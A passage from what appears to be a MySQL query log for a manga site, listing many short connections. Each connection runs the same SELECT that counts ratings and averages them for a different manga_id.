u317079482_mangacherri_2 using Socket 330643749 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330643749 Quit 330643750 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330643750 Quit 330643751 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643751 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330643751 Quit 330643752 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643752 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330643752 Quit 330643753 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643753 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330643753 Quit 330643754 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643754 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330643754 Quit 330643755 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643755 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330643755 Quit 330643756 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330643756 Quit 330643757 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643757 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330643757 Quit 330643758 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330643758 Quit 330643759 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330643759 Quit 330643760 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330643760 Quit 330643761 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330643761 Quit 330643762 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330643762 Quit 330643763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330643763 Quit 330643764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643764 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330643764 Quit 330643765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330643765 Quit 330643766 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643766 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330643766 Quit 330643767 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330643767 Quit 330643768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330643768 Quit 330643769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330643769 Quit 330643770 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330643770 Quit 330643771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330643771 Quit 330643772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330643772 Quit 330643773 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330643773 Quit 330643774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330643774 Quit 330643775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330643775 Quit 330643776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330643776 Quit 330643777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330643777 Quit 330643778 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643778 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330643778 Quit 330643779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330643779 Quit 330643780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330643780 Quit 330643781 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330643781 Quit 330643782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330643782 Quit 330643783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330643783 Quit 330643784 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330643784 Quit 330643785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330643785 Quit 330643786 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330643786 Quit 330643787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330643787 Quit 330643788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330643788 Quit 330643789 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330643789 Quit 330643790 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330643790 Quit 330643791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330643791 Quit 330643792 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330643792 Quit 330643793 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330643793 Quit 330643794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330643794 Quit 330643795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330643795 Quit 330643796 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643796 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330643796 Quit 330643797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330643797 Quit 330643798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330643798 Quit 330643799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330643799 Quit 330643800 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330643800 Quit 330643801 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330643801 Quit 330643802 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330643802 Quit 330643803 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330643803 Quit 330643804 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330643804 Quit 330643805 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330643805 Quit 330643806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330643806 Quit 330643807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330643807 Quit 330643808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330643808 Quit 330643809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330643809 Quit 330643810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330643810 Quit 330643811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330643811 Quit 330643812 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330643812 Quit 330643813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330643813 Quit 330643814 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330643814 Quit 330643815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330643815 Quit 330643816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330643816 Quit 330643817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330643817 Quit 330643818 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330643818 Quit 330643819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330643819 Quit 330643820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330643820 Quit 330643821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330643821 Quit 330643822 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330643822 Quit 330643823 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330643823 Quit 330643824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330643824 Quit 330643825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330643825 Quit 330643826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643826 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330643826 Quit 330643827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330643827 Quit 330643828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330643828 Quit 330643829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330643829 Quit 330643830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330643830 Quit 330643831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330643831 Quit 330643832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330643832 Quit 330643833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330643833 Quit 330643834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330643834 Quit 330643835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330643835 Quit 330643836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330643836 Quit 330643837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330643837 Quit 330643838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330643838 Quit 330643839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330643839 Quit 330643840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330643840 Quit 330643841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330643841 Quit 330643842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330643842 Quit 330643843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330643843 Quit 330643844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330643844 Quit 330643845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330643845 Quit 330643846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330643846 Quit 330643847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330643847 Quit 330643848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330643848 Quit 330643849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330643849 Quit 330643850 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330643850 Quit 330643851 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330643851 Quit 330643852 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330643852 Quit 330643853 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330643853 Quit 330643854 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330643854 Quit 330643855 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330643855 Quit 330643856 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330643856 Quit 330643857 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330643857 Quit 330643858 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330643858 Quit 330643859 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330643859 Quit 330643860 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330643860 Quit 330643861 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330643861 Quit 330643862 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330643862 Quit 330643863 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330643863 Quit 330643864 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330643864 Quit 330643865 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330643865 Quit 330643866 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330643866 Quit 330643867 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330643867 Quit 330643868 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643868 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330643868 Quit 330643869 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330643869 Quit 330643870 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330643870 Quit 330643871 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330643871 Quit 330643872 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330643872 Quit 330643873 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330643873 Quit 330643874 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643874 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330643874 Quit 330643875 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643875 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330643875 Quit 330643876 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643876 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330643876 Quit 330643877 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643877 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330643877 Quit 330643878 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643878 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330643878 Quit 330643879 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643879 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330643879 Quit 330643880 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643880 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330643880 Quit 330643881 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643881 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330643881 Quit 330643882 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643882 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330643882 Quit 330643883 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643883 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330643883 Quit 330643884 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643884 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330643884 Quit 330643885 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643885 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330643885 Quit 330643886 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643886 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330643886 Quit 330643887 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643887 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330643887 Quit 330643888 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643888 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330643888 Quit 330643889 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643889 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330643889 Quit 330643890 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643890 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330643890 Quit 330643891 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643891 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330643891 Quit 330643892 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643892 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330643892 Quit 330643893 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643893 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330643893 Quit 330643894 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643894 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330643894 Quit 330643895 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643895 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330643895 Quit 330643896 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643896 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330643896 Quit 330643897 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643897 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330643897 Quit 330643898 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643898 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330643898 Quit 330643899 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643899 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330643899 Quit 330643900 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643900 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330643900 Quit 330643901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643901 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330643901 Quit 330643902 Connect mangauser@localhost on 